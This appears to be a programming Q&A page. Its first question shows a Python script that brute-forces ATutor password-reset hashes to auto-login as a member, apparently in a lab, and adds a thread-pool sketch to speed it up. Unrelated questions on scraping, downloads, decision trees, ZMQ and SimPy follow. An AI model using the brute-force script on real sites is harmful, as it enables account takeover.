I have a method that iterates through a load of values and sends a request for each one. This works fine, however it takes a long time. I want to speed this up using multiprocessing in Python 3.
My question is: what is the correct way to implement this with multiprocessing so I can speed up these requests?
The existing method is as follows:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, s.cookies, count
else:
count += 1
return False, None, count
I have tried to convert it based on the first example in the Python 3 docs here, however it just seems to hang when I start the script. No doubt I have implemented it wrong:
def send_request(word):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, word
else:
return False
It is being called from a modified version of the original method, like so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
with Pool(10) as pool:
results, word = pool.map(send_request, words)
if results:
return True, word
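For reference, a minimal sketch of how the pool call could be structured so that the results are iterated rather than unpacked into two variables. It assumes the same send_request (and its hash_string helper) defined above, and uses a thread pool from multiprocessing.dummy, since the work is network-bound:

import itertools
import string
from multiprocessing.dummy import Pool  # thread-backed Pool with the same API as multiprocessing.Pool

def change_password(id, prefix_length):
    words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
    with Pool(10) as pool:
        # imap_unordered yields one result per word as workers finish,
        # instead of waiting for the whole list like map does
        for result in pool.imap_unordered(send_request, words):
            if result and result[0]:
                return True, result[1]
    return False, None

If real processes are needed instead of threads, the same structure applies with multiprocessing.Pool, but the script then also needs the usual if __name__ == '__main__': guard.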
Related
I want to loop through a number of URL requests, but I'm having an issue: when I run the code it doesn't loop through all the numbers and only requests the page once with the output.
So my question is: how do I loop through the numbers in the URL while requesting each one and capturing all the source code I need? Everything works except the counting.
This is the code I have managed to write so far:
import urllib.request
import re
count = 1
while count <= 44:
url = ('https://example/page=%i' % count)
count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
You have a problem in your loop: you iterate over all 44 URLs, but only request the last one. This is a correct implementation:
import urllib.request
import re

def handle_url(url):
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td', str(respData))
    for eachP in paragraphs:
        print(eachP)

count = 1
while count <= 44:
    handle_url('https://example/page=%i' % count)
    count += 1
If you don't like using a function, you can simply move everything into the while loop:
import urllib.request
import re

count = 1
while count <= 44:
    url = 'https://example/page=%i' % count
    count += 1
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td', str(respData))
    for eachP in paragraphs:
        print(eachP)
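For what it's worth, the counting can also be written as a for loop over range, which avoids managing count by hand (using the handle_url function defined above):

for count in range(1, 45):
    handle_url('https://example/page=%i' % count)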
I am getting the error below when downloading files using multiprocessing. I am downloading Wikipedia page views, and they are broken down by hour, so it might involve a lot of downloading.
Any recommendation as to why this error is caused and how to solve it? Thanks.
MaybeEncodingError: Error sending result:
''. Reason: 'TypeError("cannot serialize
'_io.BufferedReader' object",)'
import fnmatch
import requests
import urllib.request
from bs4 import BeautifulSoup
import multiprocessing as mp
def download_it(download_file):
global path_to_save_document
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = path_to_save_document + filename
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(save_file_w_submission_path)
pattern = r'*200801*'
url_to_download = r'https://dumps.wikimedia.org/other/pagecounts-raw/'
path_to_save_document = r'D:\Users\Jonathan\Desktop\Wikipedia\\'
def main():
global pattern
global url_to_download
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 4:
list_of_href_year.append(url_to_download + lien + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r = requests.get(loh)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 7:
list_of_href_months.append(loh + lien + '/')
if not list_of_href_months:
continue
for lohp in list_of_href_months:
r = requests.get(lohp)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if "pagecounts" in lien:
list_of_href_pageviews.append(lohp + lien)
matching_list_of_href = fnmatch.filter(list_of_href_pageviews, pattern)
matching_list_of_href.sort()
with mp.Pool(mp.cpu_count()) as p:
print(p.map(download_it, matching_list_of_href))
if __name__ == '__main__':
main()
As Darkonaut proposed, I used multithreading instead.
Example:
from multiprocessing.dummy import Pool as ThreadPool
'''This function is used for the download the files using multi threading'''
def multithread_download_files_func(self,download_file):
try:
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = self.ptsf + filename
'''Check if the download doesn't already exists. If not, proceed otherwise skip'''
if not os.path.exists(save_file_w_submission_path):
data_content = None
try:
'''Lets download the file'''
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
except urllib.error.HTTPError:
'''We will do a retry on the download if the server is temporarily unavailable'''
retries = 1
success = False
while not success:
try:
'''Make another request if the previous one failed'''
response = urllib.request.urlopen(download_file)
data_content = response.read()
success = True
except Exception:
'''We will make the program wait a bit before sending another request to download the file'''
wait = retries * 5;
time.sleep(wait)
retries += 1
except Exception as e:
print(str(e))
'''If the response data is not empty, we will write as a new file and stored in the data lake folder'''
if data_content:
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(self.present_extract_RC_from_RS + filename)
except Exception as e:
print('funct multithread_download_files_func' + str(e))
'''This function is used as a wrapper before using multi threading in order to download the files to be stored in the Data Lake'''
def download_files(self,filter_files,url_to_download,path_to_save_file):
try:
self.ptsf = path_to_save_file = path_to_save_file + 'Step 1 - Data Lake\Wikipedia Pagecounts\\'
filter_files_df = filter_files
self.filter_pattern = filter_files
self.present_extract_RC_from_RS = 'WK Downloaded-> '
if filter_files_df == '*':
'''We will create a string of all the years concatenated together for later use in this program'''
reddit_years = [2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018]
filter_files_df = ''
'''Go through the years from 2005 to 2018'''
for idx, ry in enumerate(reddit_years):
filter_files_df += '*' + str(ry) + '*'
if (idx != len(reddit_years)-1):
filter_files_df += '&'
download_filter = list([x.strip() for x in filter_files_df.split('&')])
download_filter.sort()
'''If folder doesn't exist, create one'''
if not os.path.exists(os.path.dirname(self.ptsf)):
os.makedirs(os.path.dirname(self.ptsf))
'''We will get the website HTML elements using beautifulsoup library'''
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
'''Lets get all href available on this particular page. The first page is the year page'''
for link0 in soup.find_all('a'):
lien0 = link0.get('href')
'''We will check if the length is 4 which corresponds to a year'''
if len(lien0) == 4:
list_of_href_year.append(url_to_download + lien0 + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r1 = requests.get(loh)
data1 = r1.text
'''Get the webpage HTML Tags'''
soup1 = BeautifulSoup(data1,features="lxml")
for link1 in soup1.find_all('a'):
lien1 = link1.get('href')
'''We will check if the length is 7 which corresponds to the year and month'''
if len(lien1) == 7:
list_of_href_months.append(loh + lien1 + '/')
for lohm in list_of_href_months:
r2 = requests.get(lohm)
data2 = r2.text
'''Get the webpage HTML Tags'''
soup2 = BeautifulSoup(data2,features="lxml")
for link2 in soup2.find_all('a'):
lien2 = link2.get('href')
'''We will now get all href that contains pagecounts in their name. We will have the files based on Time per hour. So 24 hrs is 24 files
and per year is 24*365=8760 files in minimum'''
if "pagecounts" in lien2:
list_of_href_pageviews.append(lohm + lien2)
existing_file_list = []
for file in os.listdir(self.ptsf):
filename = os.fsdecode(file)
existing_file_list.append(filename)
'''Filter the links'''
matching_fnmatch_list = []
if filter_files != '':
for dfilter in download_filter:
fnmatch_list = fnmatch.filter(list_of_href_pageviews, dfilter)
i = 0
for fnl in fnmatch_list:
'''Break for demo purpose only'''
if self.limit_record != 0:
if (i == self.limit_record) and (i != 0):
break
i += 1
matching_fnmatch_list.append(fnl)
'''If the user stated a filter, we will try to remove the files which are outside that filter in the list'''
to_remove = []
for efl in existing_file_list:
for mloh in matching_fnmatch_list:
if efl in mloh:
to_remove.append(mloh)
'''Lets remove the files which has been found outside the filter'''
for tr in to_remove:
matching_fnmatch_list.remove(tr)
matching_fnmatch_list.sort()
'''Multi Threading of 200'''
p = ThreadPool(200)
p.map(self.multithread_download_files_func, matching_fnmatch_list)
except Exception as e:
print('funct download_files' + str(e))
From the accepted answer, I understood that it is simply a matter of replacing from multiprocessing import Pool with from multiprocessing.dummy import Pool.
This worked for me.
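Applied to the main() in the question, a sketch of that swap, keeping download_it and matching_list_of_href exactly as they are built above:

from multiprocessing import cpu_count
from multiprocessing.dummy import Pool as ThreadPool  # threads share memory, so results never need to be pickled

# ... build matching_list_of_href as in main() above ...
with ThreadPool(cpu_count()) as p:
    print(p.map(download_it, matching_list_of_href))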
I get, "TypeError: Question() takes no arguments" (where Question is an object of class Question) when trying to execute the code below.
I'm using jupyter notebook and have checked most of my indentation, Tthe class Question has 2 attributes, I have an init method...
Issue is related to the function find_best_split(rows) below.
I have added an image of the error console output here
class Question:
def __init__(self, column, value):
self.column = column
self.value = value
def match(self, example):
val = example[self.column]
if is_numeric(val):
return val >= self.value
else:
return val == self.value
def __repr__(self):
condition = "=="
if is_numeric(self.value):
condition = ">="
return "Is %s %s %s?" % (header[self.column], condition, str(self.value))
def partition(rows, question):
true_rows, false_rows = [], []
for row in rows:
if question.match(row):
true_rows.append(row)
else:
false_rows.append(row)
return true_rows, false_rows
The error points to this function, specifically "question = Question(col, val)":
def find_best_split(rows):
best_gain = 0
best_question = None
current_uncertainty = gini(rows)
n_features = len(rows[0]) -1 # number of columns
for col in range(n_features):
values = set([row[col] for row in rows]) # unique values in the column
for val in values: #now for each value
question = Question(col, val)
# trying to split the data set
true_rows, false_rows = partition(rows, question)
# skips this split if it doesn't divide the data set.
if len(true_rows) == 0 or len(false_rows) == 0:
continue
# calculate the information gain from this split
gain = info_gain(true_rows, false_rows, current_uncertainty)
# you can use > instead of >= below but I wanted the data set to look a certain way for this example.
if gain >= best_gain:
best_gain, best_question = gain, question
return best_gain, best_question
class Decision_Node:
def __init__(self, question, true_branch, false_branch):
self.question = question
self.true_branch = true_branch
self.false_branch = false_branch
def build_tree(rows):
gain, question = find_best_split(rows)
if gain == 0:
return Leaf(rows)
true_rows, false_rows = partition(rows, question)
true_branch = build_tree(true_rows)
false_branch = build_tree(false_rows)
return Decision_Node(question, true_branch, false_branch)
if __name__ == '__main__':
my_tree = build_tree(training_data)
print_tree(my_tree)
# Evaluate
testing_data = [
["Green", 3, "Mango"],
["Yellow", 4, "Mango"],
["Red", 2, "Grape"],
["Red", 1, "Grape"],
["Yellow", 3, "Lemon"],
]
for row in testing_data:
print ("Actual: %s. Predicted: %s" % (row[-1], print_leaf(classify(row, my_tree))))
The code below is a ZMQ subscriber to a publisher that is sending me data. It uses the counter to tell me when it is 30 and 59 seconds past the minute, so I can run my write to CSV every 30 seconds or so.
Problem: I am now timing all of the processes in my thread. The lines where message and message2 = socket.recv_string() are taking anywhere from half a second to 20 seconds to receive a string, causing the thread to miss the 30 and 59 second intervals I set. This was not happening yesterday. The other timers for the if statements are taking 0.00001 or 0.0 seconds, so that part isn't the problem.
I'm wondering what could affect this. Could it be the processing power of my computer? Or does the receive time depend on how long it waits for the publisher to actually send something?
I'm not running in a dev or production environment; it's on a shared virtual server (a zero client) with something like 15 other people. I've never had this problem before, and on another script I have set up for another ZMQ pub/sub I'm receiving messages in anywhere from 0.001 or 0.01 seconds up to 3 seconds, which is more manageable, but the norm was 0.01.
Any tips or help would be amazing. Thanks in advance.
import zmq
import pandas as pd
import time
import threading
df_fills = pd.DataFrame()
df_signal = pd.DataFrame()
second_v = [30,59]
s = 0
m = 0
h = 0
d = 0
def counter():
global h,s,m,d
while True:
s += 1
#print("Second:{}".format(s))
if s >=60:
m +=1
s = 0
if m >= 60:
h += 1
m = 0
if h >= 24:
d += 1
h = 0
#print(s)
time.sleep(1)
class zmq_thread(threading.Thread):
def __init__(self,name):
threading.Thread.__init__(self)
self.name = name
def run(self):
global df_fills, second_v,s
print('zmq started')
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect(SERVER)
socket.setsockopt_string(zmq.SUBSCRIBE,'F')
print('socket connected')
tickers = [a bunch of tickers]
while True:
try:
start2 = time.time()
if s == 30:
print('break')
if df_fills.empty == True:
print('running fill thread again')
z = zmq_thread('Start_ZMQ')
#time.sleep(.7)
z.run()
else:
start = time.time()
print('writing fills')
filename = "a CSV"
with open(filename, 'a') as f:
df_fills.to_csv(f, encoding = 'utf-8', index = False, header = False)
f.close()
print('wrote fills')
end = time.time()
print(end-start)
df_fills = df_fills.iloc[0:0]
z = zmq_thread('Start_ZMQ')
z.run()
return df_fills
end2 = time.time()
print(end2-start2)
start3 = time.time()
message = socket.recv_string()
message2 = socket.recv_string()
end3 = time.time()
print(end3-start3, 'message timing')
print(s)
start1 = time.time()
if message == 'F':
# message2_split = message2.split("'")
message2_split = message2.split(";")
message3_split = [e[3:] for e in message2_split]
message4 = pd.Series(message3_split)
if message4[0] in tickers:
df_fills = df_fills.append(message4, ignore_index=True)
print('fill')
end1 = time.time()
print(end1-start1)
except KeyboardInterrupt:
break
counter = threading.Thread(target = counter)
zmq_loop = zmq_thread('Start_ZMQ')
#%%
counter.start()
zmq_loop.start()
I didn't realize that ZMQ's recv_string is blocking by default. So I did this:
try:
    message = socket.recv_string(flags=zmq.NOBLOCK)
    message2 = socket.recv_string(flags=zmq.NOBLOCK)
except zmq.ZMQError as e:
    if e.errno == zmq.EAGAIN:
        pass
else:
    if message == 'ABA_BB':
        message2_split = message2.split(";")
        message3_split = [e[3:] for e in message2_split]
        message4 = pd.Series(message3_split)
        #print(message4)
        if message4[2] == '300':
            df_signal = df_signal.append(message4, ignore_index=True)
            print('Signal Appended')
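A non-blocking receive can also be done with a poller and a timeout, which avoids busy-looping on EAGAIN. A minimal sketch, assuming the same SERVER endpoint and 'F' topic as in the question:

import zmq

context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect(SERVER)                        # same endpoint as in the question
socket.setsockopt_string(zmq.SUBSCRIBE, 'F')

poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)

while True:
    # wait up to 100 ms for a message, then fall through so timed work can still run
    events = dict(poller.poll(timeout=100))
    if socket in events:
        topic = socket.recv_string()
        payload = socket.recv_string()
        # handle topic/payload here, e.g. append to df_fills as in the question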
I'm trying to simulate two machines working and failing at random times. When they fail, they call for assistance. These two machines are part of a bigger system of different machines, each of which needs to know when its neighbor has failed to do its job.
So far, I have simulated the two machines, but I can't figure out how to send messages to their neighbors without each machine needing to know the whole system.
This is what I have so far:
import simpy
import random
random_seed=42
MTTF = 3500
break_mean = 1 / MTTF
sim_time = 4 * 7*24*60 # 4 weeks 24/7
num_machines = 2
rep_time = 30
tpp = 20 #20 minutes to make each part
neighbour = 3 #How many should it send to?
#Creating a class called messaging which is an object.
class messaging(object):
#DEfing the initilizing function, and initilize self, Environment, and capacity which is set to infinity, by a simpy core-function.
def __init__(self, env, capacity=simpy.core.Infinity):
self.env = env
self.capacity = capacity
self.pipes = []
#Making a function which work on everything that is a part of the message. With name Put.
def put(self, value):
if not self.pipes: #How to get this error?
raise runtime_error('There are no output pipes.')
#Create a variable, events, store to it pipe values
events = broken_machine()
return self.env.all_of(events)
def get_output_conn(self):
#Set the capacity of pipe variable to store infinity.
pipe = simpy.Store(self.env, capacity=self.capacity)
#to each pipes, add(or append) pipe
self.pipes.append(pipe)
return pipe
def mesg_generator(number, env, out_pipe):
msg = ('Failed')
def message_reciever(name, env, in_pipe):
while True:
msg = yield in_pipe.get()
print("%s received message: %s" % (number, msg[1]))
def time_per_part():
return tpp
def ttf():
return random.expovariate(break_mean)
class Machine(object):
def __init__(self, env, number, repair):
#self.arg = arg
self.env = env
self.number = number
self.parts_made = 0
self.times_broken = 0
self.broken = False
self.process = env.process(self.working(repair))
env.process(self.broken_machine())
def working(self, repair):
while True:
work = time_per_part()
while work:
try:
begin = self.env.now
yield self.env.timeout(work)
work = 0
except simpy.Interrupt:
self.broken = True
work -= self.env.now - begin
with repair.request(priority = 1) as req:
yield req
yield self.env.timeout(rep_time)
self.times_broken +=1
yield message_reciever()
#print('Machine down')
self.broken = False #Machine fixed again
self.parts_made +=1
def broken_machine(self):
while True:
yield self.env.timeout(ttf())
if not self.broken:
self.process.interrupt()
def other_jobs(env, repair):
while True:
work = tpp
while work:
with repair.request(priority=2) as req:
yield req
try:
begin = env.now
yield env.timeout(work)
work = 0
except simpy.Interrupt:
work -= env.now - begin
print("This simulates machines 3 and 4 doing the same tasks.")
random.seed(random_seed)
env = simpy.Environment()
pipe = simpy.Store(env)
bc_pipe = messaging(env)
repair = simpy.PreemptiveResource(env, capacity = 1)
machines = [Machine(env, 'Machine %d' % i, repair)
for i in range(num_machines)]
env.process(other_jobs(env, repair))
env.run(until=sim_time)
#Show how many times each machine failed:
for machine in machines:
print("%s broke down %d times" %(machine.number, machine.times_broken))